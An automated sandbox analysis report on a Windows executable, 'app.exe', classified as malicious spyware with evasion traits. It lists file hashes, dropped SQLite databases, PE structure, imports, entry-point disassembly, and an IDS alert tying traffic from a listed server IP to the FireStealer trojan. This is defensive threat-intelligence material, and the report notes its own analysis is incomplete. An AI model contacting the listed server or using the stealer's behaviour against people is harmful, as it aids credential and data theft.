Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:Suspected VM Detection
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Sample name:app.exe
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.spyw.evad.winEXE@10/6@1/2
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 99%
                                                                                                                                          • Number of executed functions: 35
                                                                                                                                          • Number of non-executed functions: 212
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Stop behavior analysis, all processes terminated
                                                                                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe
                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Time | Type | Description
00:24:47 | API Interceptor | 49x Sleep call for process: app.exe modified
                                                                                                                                            Process:C:\Users\user\Desktop\app.exe
                                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1290240
                                                                                                                                            Entropy (8bit):7.441704402192102
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                            MD5:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            SHA1:0461F1C46644ACDE8020BB59B53B1E34B65977CA
                                                                                                                                            SHA-256:E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
                                                                                                                                            SHA-512:14EF889F580C02E319B6D9D899DDBD1BD523C1D8B493EAB8B98DA6D3D276D76EFB9B5694759DF7D68BB9D002A8ACE8FC82D22121A7B4EA236D5F9CEF38CC809C
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                            • Antivirus: Virustotal, Detection: 11%, Browse
                                                                                                                                            Joe Sandbox View:
                                                                                                                                            • Filename: Template_signed_0405.dotm.doc, Detection: malicious, Browse
                                                                                                                                            Reputation:low
                                                                                                                                            Process:C:\Users\user\Desktop\app.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26
                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 10, database pages 7, 1st free page 5, free pages 2, cookie 0x9, schema 4, UTF-8, version-valid-for 10
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):28672
                                                                                                                                            Entropy (8bit):1.5161495002712742
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:s3n5HGsht8kAM0hsYfxqYgXZBqIcsrl3tuY2sWsqF:c5mF5wnpx9uYSF
                                                                                                                                            MD5:16A6EDF5F48F2A7B20B3B8825384B05C
                                                                                                                                            SHA1:A59542299A41166F515B18AB8CBC3D72517ED207
                                                                                                                                            SHA-256:3E1A2BB358B396C201A6058EC8A05E25B167255EB3DAEEB1130331A298CC6F93
                                                                                                                                            SHA-512:7C4C9D69B05EA5B120C0DB6DF7D0C4487387659AF6D17C387503CA360EF8430F676B0964B6BC3C368BA4DC8D0E648B2750C26970D833788982BBF5BC04AC632D
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, file counter 4, database pages 35, cookie 0x1e, schema 4, UTF-8, version-valid-for 4
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):163840
                                                                                                                                            Entropy (8bit):0.44975538801868414
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:Ou1HAU+bDoYysX0uhnyZtha58VjN9DLjGQLBE3u:Ou1X+bDo3irhnyBi8Vj3XBBE3u
                                                                                                                                            MD5:89E4498D0328AFC71113CC75EBE7D770
                                                                                                                                            SHA1:120CF58C897FF1025F8B4F854A21821D948F74BC
                                                                                                                                            SHA-256:F50B271AFE0D4950FAE539E4A04C3D07849F0CE2250E73B352CDB3D981095B40
                                                                                                                                            SHA-512:7914EDF9352FBB1ABB6A0B89A4F47F09DE5672DEB6B4BE9EBEA833C8D1ED3EFD5AD16A612DF3DF65C878EB577FD0B697BC44C3E52D9BBFB82A81C1C903621989
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):57344
                                                                                                                                            Entropy (8bit):0.7310370201569906
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                                                                            MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                                                                            SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                                                                            SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                                                                            SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):122880
                                                                                                                                            Entropy (8bit):1.1414673161713362
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                                                                            MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                                                                            SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                                                                            SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                                                                            SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                                                                            Malicious:false
                                                                                                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.441704402192102
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:app.exe
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5:75b9ef9142a78671d449c8d22ab6be14
                                                                                                                                            SHA1:0461f1c46644acde8020bb59b53b1e34b65977ca
                                                                                                                                            SHA256:e9bc44cf548a70e7285499209973faf44b7374dece1413dfcdc03bf25a6c599c
                                                                                                                                            SHA512:14ef889f580c02e319b6d9d899ddbd1bd523c1d8b493eab8b98da6d3d276d76efb9b5694759df7d68bb9d002a8ace8fc82d22121a7b4ea236d5f9cef38cc809c
                                                                                                                                            SSDEEP:24576:CIFxe+AY3rqYsavMOQdbac5IQH97wiI3dzAr09UDZ5YUD8:1xeSNR0vbac5/d8P3diDZ6q
                                                                                                                                            TLSH:8255CF05F3D2B8B1D15192772DC96161B6ED993048D83F0732D0EE5E1B3B9A6B40FE2A
                                                                                                                                            Icon Hash:0f4ecda7ae5d1715
                                                                                                                                            Entrypoint:0x415dde
                                                                                                                                            Entrypoint Section:.text
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows cui
                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:
                                                                                                                                            Time Stamp:0x500F9507 [Wed Jul 25 06:41:11 2012 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:4
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:4
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:4
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:26600adf486f72b556f917a64c8fd23f
                                                                                                                                            Instruction
                                                                                                                                            push 00000060h
                                                                                                                                            push 0043A478h
                                                                                                                                            call 00007F8C48B70DE3h
                                                                                                                                            mov edi, 00000094h
                                                                                                                                            mov eax, edi
                                                                                                                                            call 00007F8C48B6F33Fh
                                                                                                                                            mov dword ptr [ebp-18h], esp
                                                                                                                                            mov esi, esp
                                                                                                                                            mov dword ptr [esi], edi
                                                                                                                                            push esi
                                                                                                                                            call dword ptr [0042F2B4h]
                                                                                                                                            mov ecx, dword ptr [esi+10h]
                                                                                                                                            mov dword ptr [0044B190h], ecx
                                                                                                                                            mov eax, dword ptr [esi+04h]
                                                                                                                                            mov dword ptr [0044B19Ch], eax
                                                                                                                                            mov edx, dword ptr [esi+08h]
                                                                                                                                            mov dword ptr [0044B1A0h], edx
                                                                                                                                            mov esi, dword ptr [esi+0Ch]
                                                                                                                                            and esi, 00007FFFh
                                                                                                                                            mov dword ptr [0044B194h], esi
                                                                                                                                            cmp ecx, 02h
                                                                                                                                            je 00007F8C48B6FCDEh
                                                                                                                                            or esi, 00008000h
                                                                                                                                            mov dword ptr [0044B194h], esi
                                                                                                                                            shl eax, 08h
                                                                                                                                            add eax, edx
                                                                                                                                            mov dword ptr [0044B198h], eax
                                                                                                                                            xor esi, esi
                                                                                                                                            push esi
                                                                                                                                            mov edi, dword ptr [0042F20Ch]
                                                                                                                                            call edi
                                                                                                                                            cmp word ptr [eax], 5A4Dh
                                                                                                                                            jne 00007F8C48B6FCF1h
                                                                                                                                            mov ecx, dword ptr [eax+3Ch]
                                                                                                                                            add ecx, eax
                                                                                                                                            cmp dword ptr [ecx], 00004550h
                                                                                                                                            jne 00007F8C48B6FCE4h
                                                                                                                                            movzx eax, word ptr [ecx+18h]
                                                                                                                                            cmp eax, 0000010Bh
                                                                                                                                            je 00007F8C48B6FCF1h
                                                                                                                                            cmp eax, 0000020Bh
                                                                                                                                            je 00007F8C48B6FCD7h
                                                                                                                                            mov dword ptr [ebp-1Ch], esi
                                                                                                                                            jmp 00007F8C48B6FCF9h
                                                                                                                                            cmp dword ptr [ecx+00000084h], 0Eh
                                                                                                                                            jbe 00007F8C48B6FCC4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000F8h], esi
                                                                                                                                            jmp 00007F8C48B6FCE0h
                                                                                                                                            cmp dword ptr [ecx+74h], 0Eh
                                                                                                                                            jbe 00007F8C48B6FCB4h
                                                                                                                                            xor eax, eax
                                                                                                                                            cmp dword ptr [ecx+000000E8h], esi
                                                                                                                                            setne al
                                                                                                                                            mov dword ptr [ebp-1Ch], eax
                                                                                                                                            Programming Language:
                                                                                                                                            • [ASM] VS2002 (.NET) build 9466
                                                                                                                                            • [ C ] VS2002 (.NET) build 9466
                                                                                                                                            • [C++] VS2003 (.NET) build 3077
                                                                                                                                            • [C++] VS2002 (.NET) build 9466
                                                                                                                                            • [RES] VS2002 (.NET) build 9466
                                                                                                                                            • [LNK] VS2002 (.NET) build 9466
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3f924 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x2f5f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2f000 | 0x594 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2db32 | 0x2e000 | 7868e2f41e5b3ab908ac5a72a66f5953 | False | 0.6095076851222826 | data | 6.670624963209676 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x2f000 | 0x126c6 | 0x13000 | efd458d4cde7206fd4c5482997a30ba9 | False | 0.4482421875 | data | 5.736665908168061 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x42000 | 0xa9f4 | 0x4000 | 07b79e131c84ddfb0842641915843ec1 | False | 0.4459228515625 | data | 5.072911159589167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4d000 | 0x2f5f0 | 0x30000 | 2686df77c23e2ca3144ababd1a5e1501 | False | 0.2823994954427083 | data | 4.484521144858898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
)m& | 0x7d000 | 0xc5000 | 0xc5000 | acab40631ef6f655b384348be6aac2b9 | False | 0.841724996034264 | data | 7.775469163423906 | IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
JPG | 0x4f2b0 | 0x2b1e6 | PC bitmap, Windows 3.x format, 635 x 276 x 8, cbSize 176614, bits offset 1078 | Chinese | China | 0.27774128891254374
RT_CURSOR | 0x7a498 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.4805194805194805
RT_CURSOR | 0x7a5d0 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | Chinese | China | 0.7
RT_CURSOR | 0x7a6b0 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | Chinese | China | 0.36363636363636365
RT_CURSOR | 0x7a800 | 0x134 | Targa image data - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.35714285714285715
RT_CURSOR | 0x7a950 | 0x134 | data | Chinese | China | 0.37337662337662336
RT_CURSOR | 0x7aaa0 | 0x134 | data | Chinese | China | 0.37662337662337664
RT_CURSOR | 0x7abf0 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.36688311688311687
RT_CURSOR | 0x7ad40 | 0x134 | Targa image data 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.37662337662337664
RT_CURSOR | 0x7ae90 | 0x134 | Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.36688311688311687
RT_CURSOR | 0x7afe0 | 0x134 | Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001" | Chinese | China | 0.38636363636363635
RT_CURSOR | 0x7b130 | 0x134 | data | Chinese | China | 0.44155844155844154
RT_CURSOR | 0x7b280 | 0x134 | data | Chinese | China | 0.4155844155844156
RT_CURSOR | 0x7b3d0 | 0x134 | AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rd | Chinese | China | 0.5422077922077922
RT_CURSOR | 0x7b520 | 0x134 | data | Chinese | China | 0.2662337662337662
RT_CURSOR | 0x7b670 | 0x134 | data | Chinese | China | 0.2824675324675325
RT_CURSOR | 0x7b7c0 | 0x134 | data | Chinese | China | 0.3246753246753247
RT_BITMAP | 0x7b9f8 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | Chinese | China | 0.44565217391304346
RT_BITMAP | 0x7bab0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | Chinese | China | 0.37962962962962965
RT_ICON | 0x4db70 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Chinese | China | 0.6042418772563177
RT_ICON | 0x4e430 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Chinese | China | 0.6042418772563177
RT_DIALOG | 0x4ecf0 | 0x23e | data | Chinese | China | 0.5174216027874564
RT_DIALOG | 0x4ef30 | 0x94 | data | Chinese | China | 0.6959459459459459
RT_DIALOG | 0x7b910 | 0xe2 | data | Chinese | China | 0.6637168141592921
RT_STRING | 0x7bbf8 | 0x46 | data | Chinese | China | 0.6857142857142857
RT_STRING | 0x7bc40 | 0x54 | data | Chinese | China | 0.8571428571428571
RT_STRING | 0x7bc98 | 0x2c | data | Chinese | China | 0.5909090909090909
RT_STRING | 0x7bcc8 | 0x74 | data | Chinese | China | 0.8448275862068966
RT_STRING | 0x7bd40 | 0x1d0 | data | Chinese | China | 0.8060344827586207
RT_STRING | 0x7c088 | 0x164 | data | Chinese | China | 0.48314606741573035
RT_STRING | 0x7bf50 | 0x132 | data | Chinese | China | 0.6405228758169934
RT_STRING | 0x7c570 | 0x50 | data | Chinese | China | 0.725
RT_STRING | 0x7bf10 | 0x40 | data | Chinese | China | 0.65625
RT_STRING | 0x7c4d8 | 0x6a | data | Chinese | China | 0.7452830188679245
RT_STRING | 0x7c1f0 | 0x1d6 | data | Chinese | China | 0.6723404255319149
RT_STRING | 0x7c3c8 | 0x110 | data | Chinese | China | 0.625
RT_STRING | 0x7c548 | 0x24 | data | Chinese | China | 0.4444444444444444
RT_STRING | 0x7c5c0 | 0x30 | data | Chinese | China | 0.625
RT_GROUP_CURSOR | 0x7a688 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | Chinese | China | 1.0294117647058822
RT_GROUP_CURSOR | 0x7ae78 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7a7e8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7ad28 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7abd8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b508 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7aa88 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b118 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7a938 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7afc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b268 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b3b8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b658 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b7a8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_CURSOR | 0x7b8f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | Chinese | China | 1.3
RT_GROUP_ICON | 0x4e418 | 0x14 | data | Chinese | China | 1.15
RT_GROUP_ICON | 0x4ecd8 | 0x14 | data | Chinese | China | 1.25
RT_VERSION | 0x4efc8 | 0x2e8 | data | Chinese | China | 0.5631720430107527
DLL | Import
KERNEL32.dll | LockFile, UnlockFile, SetEndOfFile, DuplicateHandle, FindClose, FindFirstFileA, GetFullPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SetErrorMode, FileTimeToLocalFileTime, GetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, GetStartupInfoA, GetCommandLineA, RaiseException, GetSystemTimeAsFileTime, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, FlushFileBuffers, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, GetCurrentProcessId, LCMapStringA, LCMapStringW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, VirtualProtect, GetSystemInfo, VirtualQuery, SetStdHandle, SetEnvironmentVariableA, SetFilePointer, GlobalFlags, WritePrivateProfileStringA, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, GlobalDeleteAtom, lstrcmpA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, SetLastError, GlobalFree, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, FormatMessageA, LocalFree, CopyFileA, GetCurrentDirectoryA, FreeResource, OpenFile, GetCurrentProcess, SetPriorityClass, lstrcpynA, DeviceIoControl, ReadFile, GetFileSize, GetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetSystemDirectoryA, CreateFileA, WriteFile, CloseHandle, DeleteFileA, GetModuleFileNameA, LoadLibraryA, FreeLibrary, GetVolumeInformationA, OutputDebugStringA, DebugBreak, InterlockedIncrement, InterlockedDecrement, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, lstrcmpiA, CompareStringW, lstrlenW, CompareStringA, GetVersion, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, HeapDestroy, InterlockedExchange
USER32.dll | InvalidateRgn, SetCapture, ReleaseCapture, GetNextDlgGroupItem, MessageBeep, RegisterClipboardFormatA, PostThreadMessageA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, EndPaint, DestroyWindow, IsWindow, InvalidateRect, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, ValidateRect, GetParent, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, SetCursor, PostMessageA, PostQuitMessage, wsprintfA, GetMenuState, GetMenuItemID, GetMenuItemCount, CharLowerA, CharUpperA, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GetSubMenu, MessageBoxA, CharNextA, wvsprintfA, GetSystemMetrics, LoadIconA, EnableWindow, GetClientRect, IsIconic, GetSystemMenu, SendMessageA, AppendMenuA, CopyAcceleratorTableA, SetRect, IsRectEmpty, DrawIcon, LoadCursorA, GetDlgItem, GetSysColorBrush, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, DestroyMenu, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, CreateDialogIndirectParamA, GetWindowTextA, GetMessageTime
GDI32.dll | SetMapMode, DeleteObject, GetViewportExtEx, GetWindowExtEx, PtVisible, RectVisible, TextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetDeviceCaps
comdlg32.dll | GetFileTitleA
WINSPOOL.DRV | ClosePrinter, DocumentPropertiesA, OpenPrinterA
ADVAPI32.dll | RegEnumKeyA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegCloseKey, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA
COMCTL32.dll |
SHLWAPI.dll | PathFindExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
oledlg.dll |
ole32.dll | CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemAlloc, OleInitialize, OleUninitialize, CoTaskMemFree, CoCreateInstance, CoSetProxyBlanket, CoInitialize, CoUninitialize, CoRevokeClassObject, OleIsCurrentClipboard, OleFlushClipboard, CoFreeUnusedLibraries, CoRegisterMessageFilter
OLEAUT32.dll | VariantInit, SysAllocStringLen, VariantClear, VariantChangeType, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, SysAllocString, SysFreeString
iphlpapi.dll | GetAdaptersInfo
OLEACC.dll | LresultFromObject, CreateStdAccessibleObject
Language of compilation system | Country where language is spoken
Chinese | China
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/05/24-00:24:50.450010 | TCP | 2051909 | ET TROJAN Win32/FireStealer Related Server Response | 80 | 49789 | 144.208.127.230 | 192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                            May 5, 2024 00:24:50.720295906 CEST8049789144.208.127.230192.168.11.20
                                                                                                                                            May 5, 2024 00:24:50.746968031 CEST8049789144.208.127.230192.168.11.20
